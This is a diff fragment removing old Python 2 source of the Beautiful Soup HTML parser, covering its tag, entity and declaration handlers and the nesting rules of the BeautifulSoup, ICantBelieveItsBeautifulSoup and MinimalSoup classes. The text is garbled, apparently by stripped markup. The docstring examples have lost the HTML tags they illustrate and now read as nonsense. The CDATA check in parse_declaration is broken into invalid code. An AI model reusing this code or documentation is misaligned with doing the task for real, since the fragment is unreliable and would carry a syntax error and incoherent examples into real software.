self.pushTag(tag) - if selfClosing or self.isSelfClosingTag(name): - self.popTag() - if name in self.QUOTE_TAGS: - #print "Beginning quote (%s)" % name - self.quoteStack.append(name) - self.literal = 1 - return tag - - def unknown_endtag(self, name): - #print "End tag %s" % name - if self.quoteStack and self.quoteStack[-1] != name: - #This is not a real end tag. 
- #print " is not real!" % name - self.handle_data('' % name) - return - self.endData() - self._popToTag(name) - if self.quoteStack and self.quoteStack[-1] == name: - self.quoteStack.pop() - self.literal = (len(self.quoteStack) > 0) - - def handle_data(self, data): - self.currentData.append(data) - - def _toStringSubclass(self, text, subclass): - """Adds a certain piece of text to the tree as a NavigableString - subclass.""" - self.endData() - self.handle_data(text) - self.endData(subclass) - - def handle_pi(self, text): - """Handle a processing instruction as a ProcessingInstruction - object, possibly one with a %SOUP-ENCODING% slot into which an - encoding will be plugged later.""" - if text[:3] == "xml": - text = u"xml version='1.0' encoding='%SOUP-ENCODING%'" - self._toStringSubclass(text, ProcessingInstruction) - - def handle_comment(self, text): - "Handle comments as Comment objects." - self._toStringSubclass(text, Comment) - - def handle_charref(self, ref): - "Handle character references as data." - if self.convertEntities: - data = unichr(int(ref)) - else: - data = '&#%s;' % ref - self.handle_data(data) - - def handle_entityref(self, ref): - """Handle entity references as data, possibly converting known - HTML and/or XML entity references to the corresponding Unicode - characters.""" - data = None - if self.convertHTMLEntities: - try: - data = unichr(name2codepoint[ref]) - except KeyError: - pass - - if not data and self.convertXMLEntities: - data = self.XML_ENTITIES_TO_SPECIAL_CHARS.get(ref) - - if not data and self.convertHTMLEntities and \ - not self.XML_ENTITIES_TO_SPECIAL_CHARS.get(ref): - # TODO: We've got a problem here. We're told this is - # an entity reference, but it's not an XML entity - # reference or an HTML entity reference. Nonetheless, - # the logical thing to do is to pass it through as an - # unrecognized entity reference. - # - # Except: when the input is "&carol;" this function - # will be called with input "carol". 
When the input is - # "AT&T", this function will be called with input - # "T". We have no way of knowing whether a semicolon - # was present originally, so we don't know whether - # this is an unknown entity or just a misplaced - # ampersand. - # - # The more common case is a misplaced ampersand, so I - # escape the ampersand and omit the trailing semicolon. - data = "&%s" % ref - if not data: - # This case is different from the one above, because we - # haven't already gone through a supposedly comprehensive - # mapping of entities to Unicode characters. We might not - # have gone through any mapping at all. So the chances are - # very high that this is a real entity, and not a - # misplaced ampersand. - data = "&%s;" % ref - self.handle_data(data) - - def handle_decl(self, data): - "Handle DOCTYPEs and the like as Declaration objects." - self._toStringSubclass(data, Declaration) - - def parse_declaration(self, i): - """Treat a bogus SGML declaration as raw data. Treat a CDATA - declaration as a CData object.""" - j = None - if self.rawdata[i:i+9] == '', i) - if k == -1: - k = len(self.rawdata) - data = self.rawdata[i+9:k] - j = k+3 - self._toStringSubclass(data, CData) - else: - try: - j = SGMLParser.parse_declaration(self, i) - except SGMLParseError: - toHandle = self.rawdata[i:] - self.handle_data(toHandle) - j = i + len(toHandle) - return j - -class BeautifulSoup(BeautifulStoneSoup): - - """This parser knows the following facts about HTML: - - * Some tags have no closing tag and should be interpreted as being - closed as soon as they are encountered. - - * The text inside some tags (ie. 'script') may contain tags which - are not really part of the document and which should be parsed - as text, not tags. If you want to parse the text as tags, you can - always fetch it and parse it explicitly. - - * Tag nesting rules: - - Most tags can't be nested at all. For instance, the occurance of - a

    tag should implicitly close the previous

    tag. - -

    Para1

    Para2 - should be transformed into: -

    Para1

    Para2 - - Some tags can be nested arbitrarily. For instance, the occurance - of a

    tag should _not_ implicitly close the previous -
    tag. - - Alice said:
    Bob said:
    Blah - should NOT be transformed into: - Alice said:
    Bob said:
    Blah - - Some tags can be nested, but the nesting is reset by the - interposition of other tags. For instance, a
    , - but not close a tag in another table. - -
    BlahBlah - should be transformed into: -
    BlahBlah - but, - Blah
    Blah - should NOT be transformed into - Blah
    Blah - - Differing assumptions about tag nesting rules are a major source - of problems with the BeautifulSoup class. If BeautifulSoup is not - treating as nestable a tag your page author treats as nestable, - try ICantBelieveItsBeautifulSoup, MinimalSoup, or - BeautifulStoneSoup before writing your own subclass.""" - - def __init__(self, *args, **kwargs): - if not kwargs.has_key('smartQuotesTo'): - kwargs['smartQuotesTo'] = self.HTML_ENTITIES - kwargs['isHTML'] = True - BeautifulStoneSoup.__init__(self, *args, **kwargs) - - SELF_CLOSING_TAGS = buildTagMap(None, - ('br' , 'hr', 'input', 'img', 'meta', - 'spacer', 'link', 'frame', 'base', 'col')) - - PRESERVE_WHITESPACE_TAGS = set(['pre', 'textarea']) - - QUOTE_TAGS = {'script' : None, 'textarea' : None} - - #According to the HTML standard, each of these inline tags can - #contain another tag of the same type. Furthermore, it's common - #to actually use these tags this way. - NESTABLE_INLINE_TAGS = ('span', 'font', 'q', 'object', 'bdo', 'sub', 'sup', - 'center') - - #According to the HTML standard, these block tags can contain - #another tag of the same type. Furthermore, it's common - #to actually use these tags this way. - NESTABLE_BLOCK_TAGS = ('blockquote', 'div', 'fieldset', 'ins', 'del') - - #Lists can contain other lists, but there are restrictions. - NESTABLE_LIST_TAGS = { 'ol' : [], - 'ul' : [], - 'li' : ['ul', 'ol'], - 'dl' : [], - 'dd' : ['dl'], - 'dt' : ['dl'] } - - #Tables can contain other tables, but there are restrictions. - NESTABLE_TABLE_TAGS = {'table' : [], - 'tr' : ['table', 'tbody', 'tfoot', 'thead'], - 'td' : ['tr'], - 'th' : ['tr'], - 'thead' : ['table'], - 'tbody' : ['table'], - 'tfoot' : ['table'], - } - - NON_NESTABLE_BLOCK_TAGS = ('address', 'form', 'p', 'pre') - - #If one of these tags is encountered, all tags up to the next tag of - #this type are popped. 
- RESET_NESTING_TAGS = buildTagMap(None, NESTABLE_BLOCK_TAGS, 'noscript', - NON_NESTABLE_BLOCK_TAGS, - NESTABLE_LIST_TAGS, - NESTABLE_TABLE_TAGS) - - NESTABLE_TAGS = buildTagMap([], NESTABLE_INLINE_TAGS, NESTABLE_BLOCK_TAGS, - NESTABLE_LIST_TAGS, NESTABLE_TABLE_TAGS) - - # Used to detect the charset in a META tag; see start_meta - CHARSET_RE = re.compile("((^|;)\s*charset=)([^;]*)", re.M) - - def start_meta(self, attrs): - """Beautiful Soup can detect a charset included in a META tag, - try to convert the document to that charset, and re-parse the - document from the beginning.""" - httpEquiv = None - contentType = None - contentTypeIndex = None - tagNeedsEncodingSubstitution = False - - for i in xrange(0, len(attrs)): - key, value = attrs[i] - key = key.lower() - if key == 'http-equiv': - httpEquiv = value - elif key == 'content': - contentType = value - contentTypeIndex = i - - if httpEquiv and contentType: # It's an interesting meta tag. - match = self.CHARSET_RE.search(contentType) - if match: - if (self.declaredHTMLEncoding is not None or - self.originalEncoding == self.fromEncoding): - # An HTML encoding was sniffed while converting - # the document to Unicode, or an HTML encoding was - # sniffed during a previous pass through the - # document, or an encoding was specified - # explicitly and it worked. Rewrite the meta tag. - def rewrite(match): - return match.group(1) + "%SOUP-ENCODING%" - newAttr = self.CHARSET_RE.sub(rewrite, contentType) - attrs[contentTypeIndex] = (attrs[contentTypeIndex][0], - newAttr) - tagNeedsEncodingSubstitution = True - else: - # This is our first pass through the document. - # Go through it again with the encoding information. 
- newCharset = match.group(3) - if newCharset and newCharset != self.originalEncoding: - self.declaredHTMLEncoding = newCharset - self._feed(self.declaredHTMLEncoding) - raise StopParsing - pass - tag = self.unknown_starttag("meta", attrs) - if tag and tagNeedsEncodingSubstitution: - tag.containsSubstitutions = True - -class StopParsing(Exception): - pass - -class ICantBelieveItsBeautifulSoup(BeautifulSoup): - - """The BeautifulSoup class is oriented towards skipping over - common HTML errors like unclosed tags. However, sometimes it makes - errors of its own. For instance, consider this fragment: - - FooBar - - This is perfectly valid (if bizarre) HTML. However, the - BeautifulSoup class will implicitly close the first b tag when it - encounters the second 'b'. It will think the author wrote - "FooBar", and didn't close the first 'b' tag, because - there's no real-world reason to bold something that's already - bold. When it encounters '' it will close two more 'b' - tags, for a grand total of three tags closed instead of two. This - can throw off the rest of your document structure. The same is - true of a number of other tags, listed below. - - It's much more common for someone to forget to close a 'b' tag - than to actually use nested 'b' tags, and the BeautifulSoup class - handles the common case. 
This class handles the not-co-common - case: where you can't believe someone wrote what they did, but - it's valid HTML and BeautifulSoup screwed up by assuming it - wouldn't be.""" - - I_CANT_BELIEVE_THEYRE_NESTABLE_INLINE_TAGS = \ - ('em', 'big', 'i', 'small', 'tt', 'abbr', 'acronym', 'strong', - 'cite', 'code', 'dfn', 'kbd', 'samp', 'strong', 'var', 'b', - 'big') - - I_CANT_BELIEVE_THEYRE_NESTABLE_BLOCK_TAGS = ('noscript',) - - NESTABLE_TAGS = buildTagMap([], BeautifulSoup.NESTABLE_TAGS, - I_CANT_BELIEVE_THEYRE_NESTABLE_BLOCK_TAGS, - I_CANT_BELIEVE_THEYRE_NESTABLE_INLINE_TAGS) - -class MinimalSoup(BeautifulSoup): - """The MinimalSoup class is for parsing HTML that contains - pathologically bad markup. It makes no assumptions about tag - nesting, but it does know which tags are self-closing, that -